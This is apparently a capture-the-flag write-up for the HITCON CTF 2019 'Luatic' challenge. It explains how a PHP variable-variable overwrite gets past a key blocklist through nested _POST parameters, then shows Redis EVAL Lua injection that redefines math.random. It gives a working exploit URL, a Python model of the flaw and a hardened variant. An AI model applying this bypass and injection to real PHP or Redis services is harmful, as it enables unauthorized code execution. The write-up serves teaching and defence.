# Luatic

First Blood is difficult to get

![](https://i.imgur.com/9g4VV0m.png)

```
foreach($_REQUEST as $k=>$v) {
    if( strlen($k) > 0 && preg_match('/^(FLAG|MY_|TEST_|GLOBALS)/i',$k) )
        exit('Shame on you');
}

foreach(Array('_GET','_POST') as $request) {
    foreach($$request as $k => $v)
        ${$k} = str_replace(str_split("[]{}=.'\""), "", $v);
}
```

Obviously you can overwrite global variables through `${$k}`, but the first loop blocks the interesting names (`FLAG*`, `MY_*`, `TEST_*`, `GLOBALS`). That check only looks at the top-level keys of `$_REQUEST`, never at values or nested keys, so you can still pass `_POST[whatever]=...` as a GET parameter: the key `_POST` passes the regex, the `_GET` pass then assigns `${'_POST'}`, i.e. replaces `$_POST` with your array, and the following `_POST` pass extracts `MY_SET_COMMAND`, `TEST_KEY` and `TEST_VALUE` from it.

```
$redis->rawCommand($MY_SET_COMMAND, $TEST_KEY, $TEST_VALUE);
if ($redis->get($TEST_KEY) !== $TEST_VALUE) die('Something Wrong?');

$LUA_LOTTERY = "math.randomseed(ARGV[1]) for i=0, ARGV[2] do math.random() end return math.random(2^31-1)";
$seed = random_int(0, 0xffffffff / 2);
$count = random_int(5, 10);
$result = $redis->eval($LUA_LOTTERY, array($seed, $count));
```

Obviously you need to override the random function, and `rawCommand` with `MY_SET_COMMAND=EVAL` lets you run an arbitrary Lua script in Redis (`TEST_KEY` becomes the script, `TEST_VALUE` the number of keys). But the dot `.` is stripped from every input value, so you cannot write `math.random = ...`. You can write `math:random` instead: `function math:random(q) return 3 end` is Lua's method-definition sugar for `math.random = function(self, q) return 3 end`, so it still assigns the `random` field of the `math` table, and the implicit `self` parameter just swallows whatever argument the lottery passes (`2^31-1` or nothing).

`http://54.250.242.183/luatic.php?_POST[MY_SET_COMMAND]=EVAL&_POST[TEST_KEY]=function%20math:random(q)%20return%203%20end&_POST[TEST_VALUE]=0&_POST[token]=<token>&_POST[guess]=3`

This request dies at `Something Wrong?` (there is no such key to `get`), but the EVAL has already run and the redefined `math.random` stays in the Redis Lua state. Then you need to run again without `_POST[MY_SET_COMMAND]`, with `guess=3`, to get the flag.

Reference: https://stackoverflow.com/questions/4911186/difference-between-and-in-lua

###### tags: `HITCON CTF 2019 Quals`
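To make the bypass concrete, here is a small Python model of the PHP preprocessing above, added as an example for this writeup (it is not the challenge's code). It reproduces the top-level key check, the `str_replace` character stripping (including PHP's behaviour of filtering each entry of an array value), and the two `${$k}` passes, next to a hardened variant that only binds explicitly named parameters. The default values for `MY_SET_COMMAND`, `TEST_KEY` and `TEST_VALUE` are assumptions; the challenge source shown here does not include them.

```python
import re

# Names the original PHP rejects when they appear as top-level $_REQUEST keys.
BLOCKED_KEY = re.compile(r"^(FLAG|MY_|TEST_|GLOBALS)", re.IGNORECASE)
# Characters the original strips from every value.
STRIPPED = set("[]{}=.'\"")
# Assumed defaults for the challenge's variables (not shown in the source).
DEFAULTS = {"MY_SET_COMMAND": "SET", "TEST_KEY": "key", "TEST_VALUE": "0"}
# Parameters the application actually needs from the user.
ALLOWED = ("token", "guess")


class ShameOnYou(Exception):
    """Raised where the PHP calls exit('Shame on you')."""


def strip_chars(value):
    """Model of str_replace(str_split("[]{}=.'\""), "", $v).

    PHP applies the replacement to each string entry of an array subject and
    copies nested arrays through untouched, so a dict is handled per entry.
    """
    if isinstance(value, dict):
        return {k: (strip_chars(v) if isinstance(v, str) else v)
                for k, v in value.items()}
    return "".join(ch for ch in value if ch not in STRIPPED)


def vulnerable_extract(get, post, defaults=DEFAULTS):
    """Model of the two foreach loops; returns the script's variable table."""
    variables = dict(defaults)
    variables["_GET"] = dict(get)
    variables["_POST"] = dict(post)
    # First loop: only the top-level keys of $_REQUEST are inspected.
    for key in list(get) + list(post):
        if key and BLOCKED_KEY.match(key):
            raise ShameOnYou(key)
    # Second loop: ${$k} = filtered value, for $_GET and then $_POST.  The
    # table is looked up by name on each pass, so a GET key named "_POST"
    # replaces $_POST before the second pass reads it.
    for request in ("_GET", "_POST"):
        for k, v in dict(variables[request]).items():
            variables[k] = strip_chars(v)
    return variables


def hardened_extract(get, post, defaults=DEFAULTS):
    """Bind only the expected parameters, only as strings, never by name."""
    variables = dict(defaults)
    merged = {**get, **post}
    for name in ALLOWED:
        value = merged.get(name)
        if isinstance(value, str):
            variables[name] = strip_chars(value)
    return variables


if __name__ == "__main__":
    # Constructed request mirroring the writeup's URL.
    payload = {"_POST": {"MY_SET_COMMAND": "EVAL",
                         "TEST_KEY": "function math:random(q) return 3 end",
                         "TEST_VALUE": "0", "token": "t", "guess": "3"}}
    v = vulnerable_extract(payload, {})
    print(v["MY_SET_COMMAND"], "|", v["TEST_KEY"])
    print(hardened_extract(payload, {})["MY_SET_COMMAND"])
```

The direct form `MY_SET_COMMAND=EVAL` raises `ShameOnYou`, the nested form survives with the colon syntax intact, and the dotted form `math.random = ...` comes out as `mathrandom  function...`, which is why the colon trick is needed. The hardened version keeps `MY_SET_COMMAND` at its default no matter how the request is shaped.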